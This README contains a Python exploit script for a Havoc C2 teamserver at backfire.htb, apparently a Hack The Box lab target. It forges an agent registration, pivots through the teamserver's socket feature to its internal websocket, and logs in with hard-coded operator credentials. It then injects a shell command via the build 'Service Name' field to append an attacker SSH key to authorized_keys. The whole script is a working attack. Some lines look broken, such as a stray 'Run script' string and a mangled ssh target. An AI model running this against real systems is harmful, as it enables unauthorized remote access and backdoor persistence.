# README.md
# Rendering markdown...
import os
import json
import random
import string
import binascii
import requests
import urllib3
import subprocess
from hashlib import sha3_256
from Crypto.Cipher import AES
from Crypto.Util import Counter
# Disable SSL warnings (not recommended for production)
# Silence urllib3 warnings for the whole process, using the library's default
# warning category. post_data() sends its requests with verify=False, which
# would otherwise emit a warning on every call.
urllib3.disable_warnings()
# Repeat the suppression through the urllib3 module exposed under
# requests.packages, this time explicitly for InsecureRequestWarning.
requests.packages.urllib3.disable_warnings(
    requests.packages.urllib3.exceptions.InsecureRequestWarning
)
# Constants and configurations
# --- Teamserver endpoint and HTTP headers sent with every POST ---------------
TEAMSRV_URL = "https://backfire.htb"
HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64)",
}

# --- Operator credentials; the password is transmitted as a SHA3-256 hex digest
C2_USER = "ilya"
C2_PASS_RAW = "CobaltStr1keSuckz!"
C2_PASS_HASH = sha3_256(C2_PASS_RAW.encode()).hexdigest()

# --- Packet framing / crypto material ----------------------------------------
MAGIC_COOKIE = bytes.fromhex("deadbeef")
AES_KEY = bytes(32)  # 32 zero bytes
AES_IV = bytes(16)  # 16 zero bytes

# --- Agent metadata placed in the registration body --------------------------
# AGENT_ID is drawn before PROCESS_ID so the random-number sequence is unchanged.
AGENT_ID = random.randint(100000, 999999).to_bytes(4, byteorder="big")
HOSTNAME = b"DESKTOP-ASDF123"
USERNAME = b"Administrator"
DOMAIN_NAME = b"ECORP"
INTERNAL_IP = b"127.0.0.1"
PROCESS_NAME = "msedge.exe".encode("utf-16le")
PROCESS_ID = random.randint(1000, 5000).to_bytes(4, byteorder="big")

# --- Socket parameters used by the socket steps -------------------------------
SOCK_ID = b"\x11" * 4
SOCK_IP = "127.0.0.1"
SOCK_PORT = 40056

# --- Path of the local SSH private key (the public key is SSH_KEYFILE + ".pub")
SSH_KEYFILE = "key"
# Logging functions
def log_info(message):
    """Print *message* on stdout with an ``[INFO]`` prefix."""
    print("[INFO] {}".format(message))
def log_error(message):
    """Print *message* on stdout with an ``[ERROR]`` prefix."""
    print("[ERROR] {}".format(message))
# Padding AES key to ensure it is 32 bytes
def pad_key(k: bytes) -> bytes:
    """Right-pad a short AES key to 32 bytes with ASCII ``0`` characters.

    Keys that are already 32 bytes or longer are returned unchanged; they are
    not truncated.
    """
    if len(k) >= 32:
        return k
    # The fill byte is the character "0" (0x30), not a NUL byte.
    return k.ljust(32, b"0")
# AES CTR mode encryption
def aes_ctr_encrypt(k: bytes, iv: bytes, data: bytes) -> bytes:
    """Encrypt *data* with AES in CTR mode and return the ciphertext.

    The key is passed through ``pad_key`` first. *iv* is read as a big-endian
    integer and used as the initial value of a 128-bit counter.
    """
    start_value = int(binascii.hexlify(iv), 16)
    counter = Counter.new(128, initial_value=start_value)
    cipher = AES.new(pad_key(k), AES.MODE_CTR, counter=counter)
    return cipher.encrypt(data)
# AES CTR mode decryption
def aes_ctr_decrypt(k: bytes, iv: bytes, data: bytes) -> bytes:
    """Decrypt *data* with AES in CTR mode and return the plaintext.

    The key is passed through ``pad_key`` first. *iv* is read as a big-endian
    integer and used as the initial value of a 128-bit counter.
    """
    start_value = int(binascii.hexlify(iv), 16)
    counter = Counter.new(128, initial_value=start_value)
    cipher = AES.new(pad_key(k), AES.MODE_CTR, counter=counter)
    return cipher.decrypt(data)
# Integer to big-endian bytes
def i2b(v: int, length: int = 4) -> bytes:
    """Serialize *v* as an unsigned big-endian integer of *length* bytes.

    Raises:
        OverflowError: if *v* is negative or does not fit in *length* bytes.
    """
    return v.to_bytes(length, byteorder="big")
# Send a POST request
def post_data(packet: bytes, timeout: float = 30.0) -> requests.Response:
    """POST *packet* to ``TEAMSRV_URL`` and return the response.

    Args:
        packet: Raw request body.
        timeout: Seconds to wait for the server before giving up. Without a
            timeout ``requests`` can block indefinitely on an unresponsive
            host; a timeout surfaces as a ``RequestException`` and is handled
            like any other transport failure.

    Returns:
        The ``requests.Response`` on success. On any ``RequestException`` the
        error is logged and a stand-in object with ``status_code == 0`` and
        ``content == b""`` is returned, so callers can check ``status_code``
        without handling exceptions themselves.
    """
    try:
        # Certificate verification is intentionally off (verify=False).
        return requests.post(
            TEAMSRV_URL,
            data=packet,
            headers=HEADERS,
            verify=False,
            timeout=timeout,
        )
    except requests.RequestException as e:
        log_error(f"POST request failed: {e}")

        class DummyResponse:
            # Minimal subset of the Response interface that callers read.
            status_code = 0
            content = b""

        return DummyResponse()
# Generate an SSH key if it doesn't exist, return public key contents
def create_ssh_key() -> str:
    """Return the contents of the SSH public key, generating the pair if needed.

    When ``SSH_KEYFILE`` does not exist, an ed25519 key pair with an empty
    passphrase is created via ``ssh-keygen`` and the private key is restricted
    to mode 0600.

    Returns:
        The stripped text of ``SSH_KEYFILE + ".pub"``, or ``""`` when key
        generation fails or the public key file is missing.
    """
    if not os.path.exists(SSH_KEYFILE):
        log_info("Generating SSH key...")
        cmd = [
            "ssh-keygen",
            "-t", "ed25519",
            "-C", SSH_KEYFILE,
            "-f", SSH_KEYFILE,
            "-q",
            "-N", "",
        ]
        try:
            subprocess.run(cmd, check=True)
            os.chmod(SSH_KEYFILE, 0o600)
        except (subprocess.CalledProcessError, FileNotFoundError) as e:
            # FileNotFoundError covers a missing ssh-keygen binary.
            log_error(f"SSH key generation failed: {e}")
            return ""

    pubfile = SSH_KEYFILE + ".pub"
    # Open directly instead of checking existence first, and use a context
    # manager so the file handle is always closed.
    try:
        with open(pubfile, "r") as fh:
            return fh.read().strip()
    except FileNotFoundError:
        return ""
# Build a masked WebSocket frame for the given message
def build_websocket_frame(msg: str) -> bytes:
    """Wrap *msg* in a single masked WebSocket text frame.

    Layout of the result: first byte 0x81, a length byte with the mask bit
    (0x80) set, an optional 2- or 8-byte big-endian extended length, a random
    4-byte mask, and the UTF-8 payload XOR-ed with that mask.
    """
    data = msg.encode("utf-8")
    size = len(data)
    fin_text = 0x81  # text frame
    masked = 0x80

    # Select the length encoding: 7-bit inline, 16-bit, or 64-bit extended.
    if size > 65535:
        prefix = bytes((fin_text, masked | 127)) + size.to_bytes(8, "big")
    elif size > 125:
        prefix = bytes((fin_text, masked | 126)) + size.to_bytes(2, "big")
    else:
        prefix = bytes((fin_text, masked | size))

    # XOR every payload byte with the mask byte at position (index mod 4).
    key = os.urandom(4)
    scrambled = bytearray(size)
    for pos, byte in enumerate(data):
        scrambled[pos] = byte ^ key[pos % 4]

    return prefix + key + bytes(scrambled)
# Send a packet with optional AES-CTR encryption
def send_packet(cmd: bytes, rid: bytes, body: bytes, desc: str, encrypt=True) -> None:
    """Assemble a packet, POST it via ``post_data`` and log the outcome.

    With ``encrypt`` true, the 4-byte value ``len(body) + 4`` followed by
    *body* is AES-CTR encrypted and sent after the magic cookie, agent id,
    *cmd* and *rid*. With ``encrypt`` false, *body* follows the magic cookie
    and agent id directly, and *cmd* and *rid* are not used.

    In both cases the packet starts with a 4-byte size field holding 12 plus
    the length of the (encrypted or plain) trailing data.
    """
    if not encrypt:
        size = 12 + len(body)
        payload = MAGIC_COOKIE + AGENT_ID + body
    else:
        # Encrypt the length prefix together with the body.
        sealed = aes_ctr_encrypt(AES_KEY, AES_IV, i2b(len(body) + 4) + body)
        size = 12 + len(sealed)
        payload = MAGIC_COOKIE + AGENT_ID + cmd + rid + sealed

    response = post_data(i2b(size) + payload)
    status = response.status_code

    if status == 200:
        log_info(f"{desc} => OK")
        return
    if status == 404:
        log_info("You have pawned it!")
        return
    log_error(f"{desc} => FAIL ({status})")
# Register agent
def step_register_agent():
    """Send the unencrypted registration packet describing this agent.

    The body is the concatenation of the command id, the request id, the AES
    key and IV, the agent id, a series of length-prefixed metadata fields, the
    process id and 100 filler bytes.
    """
    log_info("Registering agent...")
    fields = [
        b"\x00\x00\x00\x63",  # command id
        b"\x00\x00\x00\x01",  # request id
        AES_KEY,
        AES_IV,
        AGENT_ID,
        i2b(len(HOSTNAME)),
        HOSTNAME,
        i2b(len(USERNAME)),
        USERNAME,
        i2b(len(DOMAIN_NAME)),
        DOMAIN_NAME,
        i2b(len(INTERNAL_IP)),
        INTERNAL_IP,
        # The declared length is 6 less than the real process-name length.
        i2b(len(PROCESS_NAME) - 6),
        PROCESS_NAME,
        PROCESS_ID,
        b"\xab" * 100,  # trailing filler
    ]
    send_packet(b"", b"", b"".join(fields), "Register Agent", encrypt=False)
# Open socket on the teamserver
def step_open_socket():
    """Send the encrypted "Open Socket" packet for ``SOCK_IP``:``SOCK_PORT``.

    The body is: sub-command, socket id, two fixed 4-byte placeholder values,
    the octets of ``SOCK_IP`` in reverse order, and the port as 4 big-endian
    bytes.
    """
    log_info("Opening socket on the teamserver...")
    command = b"\x00\x00\x09\xec"
    request_id = b"\x00\x00\x00\x02"

    # Dotted-quad octets, last one first, each as a single byte.
    octets = reversed(SOCK_IP.split("."))
    reversed_ip = b"".join(int(octet).to_bytes(1, "big") for octet in octets)

    parts = (
        b"\x00\x00\x00\x10",  # sub-command
        SOCK_ID,
        b"\x22\x22\x22\x22",
        b"\x33\x33\x33\x33",
        reversed_ip,
        i2b(SOCK_PORT),
    )
    send_packet(command, request_id, b"".join(parts), "Open Socket")
# Write data to the socket
def step_write_socket(data_bytes: bytes, desc: str, subcmd: bytes = b"\x00\x00\x00\x11"):
    """Send *data_bytes* to the socket identified by ``SOCK_ID``.

    Args:
        data_bytes: Payload to write; it is sent with a 4-byte length prefix.
        desc: Label used in the success/failure log line.
        subcmd: 4-byte sub-command placed at the start of the body.
    """
    command = b"\x00\x00\x09\xec"
    request_id = b"\x00\x00\x00\x08"
    parts = (
        subcmd,
        SOCK_ID,
        b"\x00\x00\x00\x03",
        b"\x00\x00\x00\x01",
        i2b(len(data_bytes)),
        data_bytes,
    )
    send_packet(command, request_id, b"".join(parts), desc)
# Read data from the socket and decrypt it
def step_read_socket() -> bytes:
    """Request pending data from the teamserver and return it decrypted.

    Returns:
        The decrypted response with its first 12 bytes removed, or ``b""``
        when the HTTP status is not 200.
    """
    log_info("Reading response from socket...")
    trailer = b"\x00\x00\x00\x01" + b"\x00\x00\x00\x09"  # command + request id
    request = i2b(12 + len(trailer)) + MAGIC_COOKIE + AGENT_ID + trailer

    response = post_data(request)
    if response.status_code == 200:
        log_info("Read from Socket => OK")
        # Skip the first 12 bytes of the reply before decrypting, then drop
        # the first 12 bytes of the plaintext as well.
        plaintext = aes_ctr_decrypt(AES_KEY, AES_IV, response.content[12:])
        return plaintext[12:]

    log_error(f"Read from Socket => FAIL ({response.status_code})")
    return b""
# Main script execution
# Obtain (or create) the local SSH key pair; stop if no public key is available.
ssh_pub = create_ssh_key()
if not ssh_pub:
    log_error("No SSH public key found or could not be generated.")
    raise SystemExit

# Register the agent, then ask the teamserver to open a socket to
# SOCK_IP:SOCK_PORT. Every later step_write_socket() call writes to that socket.
step_register_agent()
step_open_socket()

# HTTP Upgrade request written through the socket.
# NOTE(review): the Host header hard-codes 127.0.0.1:40056 instead of reusing
# SOCK_IP / SOCK_PORT; the two must be kept in sync by hand.
handshake_req = (
    b"GET /havoc/ HTTP/1.1\r\n"
    b"Host: 127.0.0.1:40056\r\n"
    b"Upgrade: websocket\r\n"
    b"Sec-WebSocket-Key: h/TPDav2VwnJVqKeDYxRgQ==\r\n"
    b"Sec-WebSocket-Version: 13\r\n"
    b"Connection: Upgrade\r\n\r\n"
)
step_write_socket(handshake_req, "WebSocket Handshake")

# Login message carrying the user name and the SHA3-256 password digest,
# sent as a masked WebSocket text frame.
auth_payload = {
    "Body": {"Info": {"Password": C2_PASS_HASH, "User": C2_USER}, "SubEvent": 3},
    "Head": {"Event": 1, "OneTime": "", "Time": "18:40:17", "User": C2_USER},
}
step_write_socket(build_websocket_frame(json.dumps(auth_payload)), "Authenticate C2")

# Listener definition with a random 16-character name and a random port in
# 1024-65535; the same port is used for both PortBind and PortConn.
rnd_listener = "".join(
    random.choice(string.ascii_lowercase + string.digits) for _ in range(16)
)
rnd_port = random.randint(1024, 65535)
listener_info = {
    "Body": {
        "Info": {
            "Headers": "",
            "HostBind": "0.0.0.0",
            "HostHeader": "",
            "HostRotation": "round-robin",
            "Hosts": "0.0.0.0",
            "Name": rnd_listener,
            "PortBind": str(rnd_port),
            "PortConn": str(rnd_port),
            "Protocol": "Https",
            "Proxy Enabled": "false",
            "Secure": "true",
            "Status": "online",
            "Uris": "",
            "UserAgent": "Mozilla/5.0 (Windows NT 6.1; WOW64)",
        },
        "SubEvent": 1,
    },
    "Head": {"Event": 2, "OneTime": "", "Time": "00:00:00", "User": C2_USER},
}
step_write_socket(build_websocket_frame(json.dumps(listener_info)), "Create Listener")

# Shell command string that embeds the public key read above.
# NOTE(review): adjacent string literals are concatenated, so "Run script" is
# appended directly after "authorized_keys" with no separator. This looks
# unintended (possibly copy/paste residue) - confirm before relying on it.
cmd_injection = (
    "mkdir -p /home/ilya/.ssh && "
    f"echo '{ssh_pub}' >> /home/ilya/.ssh/authorized_keys && "
    "chmod 700 /home/ilya/.ssh && chmod 600 /home/ilya/.ssh/authorized_keys"
    "Run script"
)
# The command string is wrapped and placed in the "Service Name" field of the
# build configuration below.
injection_svc = f' \\\\\\" -mbla; {cmd_injection} && false #'

# Build request that references the listener created above. "Config" is a
# hand-assembled JSON document carried as a string inside the outer JSON.
final_json = {
    "Body": {
        "Info": {
            "AgentType": "Demon",
            "Arch": "x64",
            "Listener": rnd_listener,
            "Config": (
                "{\n"
                ' "Amsi/Etw Patch": "None",\n'
                ' "Indirect Syscall": false,\n'
                ' "Injection": {\n'
                ' "Alloc": "Native/Syscall",\n'
                ' "Execute": "Native/Syscall",\n'
                ' "Spawn32": "C:\\\\Windows\\\\SysWOW64\\\\notepad.exe",\n'
                ' "Spawn64": "C:\\\\Windows\\\\System32\\\\notepad.exe"\n'
                " },\n"
                ' "Jitter": "0",\n'
                ' "Proxy Loading": "None (LdrLoadDll)",\n'
                f' "Service Name":"{injection_svc}",\n'
                ' "Sleep": "2",\n'
                ' "Sleep Jmp Gadget": "None",\n'
                ' "Sleep Technique": "WaitForSingleObjectEx",\n'
                ' "Stack Duplication": false\n'
                "}"
            ),
            "Format": "Windows Service Exe",
        },
        "SubEvent": 2,
    },
    "Head": {"Event": 5, "OneTime": "true", "Time": "18:39:04", "User": C2_USER},
}
step_write_socket(build_websocket_frame(json.dumps(final_json)), "Inject SSH Key")

# Read whatever the teamserver returned and report the outcome. Any non-empty
# response is treated as success; the response content itself is not inspected.
resp = step_read_socket()
if resp:
    log_info("[Teamserver Final Response]\n" + resp.decode("utf-8", errors="ignore"))
    print("\033[1;32m\n~~~~~Exploit complete!~~~~~\033[0m")
    print("You can now SSH into the target via:")
    # NOTE(review): "[email protected]" looks like e-mail obfuscation residue
    # from a web page rather than the intended user@host text - confirm.
    print(f"\033[1;93mssh -i {SSH_KEYFILE} [email protected]\033[0m")
    print("\033[1;31m\n~~~~~Pawned!~~~~~\033[0m")
else:
    # resp is always falsy on this branch, so the conditional below always
    # evaluates to "No response".
    log_error("[Teamserver Final Response]\n" + (resp.decode("utf-8", errors="ignore") if resp else "No response"))